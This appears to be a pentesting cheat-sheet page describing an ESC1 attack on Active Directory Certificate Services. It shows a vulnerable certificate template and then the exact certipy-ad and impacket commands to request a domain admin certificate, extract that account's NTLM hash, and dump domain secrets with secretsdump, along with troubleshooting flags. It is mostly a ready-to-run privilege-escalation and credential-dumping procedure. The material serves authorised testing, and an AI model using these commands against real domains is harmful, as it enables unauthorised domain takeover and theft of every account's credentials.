certipy-ad

Example vulnerable Template:

CA Name                               : CA01.test.nl\Test Group
Template Name                         : IpadEnrollment
Schema Version                        : 2
Validity Period                       : 2 years
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag                 : NONE
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, IP security IKE intermediate, Server Authentication
mspki-certificate-application-policy  : Client Authentication, IP security IKE intermediate, Server Authentication
Permissions
    Enrollment Permissions
    Enrollment Rights           : <UNKNOWN>                     <SID>-26253
                                    <UNKNOWN>                     <SID>-512
                                    <UNKNOWN>                     <SID>-519
                                    NT AUTHORITY\Authenticated UsersS-1-5-11
    Object Control Permissions
    Owner                       : <UNKNOWN>                     <SID>-12575
    WriteOwner Principals       : <UNKNOWN>                     <SID>-12575
                                    <UNKNOWN>                     <SID>-512
                                    <UNKNOWN>                     <SID>-519
    WriteDacl Principals        : <UNKNOWN>                     <SID>-12575
                                    <UNKNOWN>                     <SID>-512
                                    <UNKNOWN>                     <SID>-519
    WriteProperty Principals    : <UNKNOWN>                     <SID>-12575
                                    <UNKNOWN>                     <SID>-512
                                    <UNKNOWN>                     <SID>-519

First we import necessary ticket into Kali:

impacket-getTGT test.nl/Joe:Pass123 -dc-ip 10.121.1.11
export KRB5CCNAME=Joe.ccache

Request .pfx

certipy-ad req -u '[email protected]' -k -no-pass -ca "Test Group" -target CA01.test.nl -template IpadEnrollment -upn "[email protected]"

Use .pfx to obtain NTLM hash

certipy-ad auth -pfx domainadmin.pfx

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'domainadmin.ccache'
[*] Trying to retrieve NT hash for 'domainadmin'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:<NTLM_HASH>

Dump secrets using DA hash:

impacket-secretsdump test.nl/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:<HASH>

CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template? Add flag -> "-key-size 4096"

SID-mismatch error? Pass the -sid flag to the REQ command of the user you want to impersonate

Last updated 2 months ago